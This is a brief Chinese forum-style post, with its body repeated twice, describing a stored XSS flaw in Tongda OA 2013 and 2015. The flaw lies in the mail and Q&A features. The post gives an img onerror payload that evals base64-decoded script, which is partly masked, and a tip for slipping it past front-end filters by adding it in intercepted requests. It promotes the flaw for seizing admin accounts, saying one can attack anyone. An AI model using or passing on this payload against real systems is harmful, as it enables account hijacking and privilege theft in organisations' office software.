通达oa xss
漏洞影响
2013、2015版本
复现过程
发邮件的地方、问题问答的地⽅都存在XSS,可获取他人账号权限。⼀般情况下,OA会有前端进行过滤, 所以抓包时候去添加payload,之后会对事件进行过滤,所以使用
poc
<img src=x onerror=eval(atob('cz1jcmVXXXXXytNYXRoXXXXXXXXhbmRvbSgp'))>
这个漏洞获取admin权限⾮常好用。想X谁X谁!
2013、2015版本
发邮件的地方、问题问答的地⽅都存在XSS,可获取他人账号权限。⼀般情况下,OA会有前端进行过滤, 所以抓包时候去添加payload,之后会对事件进行过滤,所以使用
poc
<img src=x onerror=eval(atob('cz1jcmVXXXXXytNYXRoXXXXXXXXhbmRvbSgp'))>
这个漏洞获取admin权限⾮常好用。想X谁X谁!
请登录后查看回复内容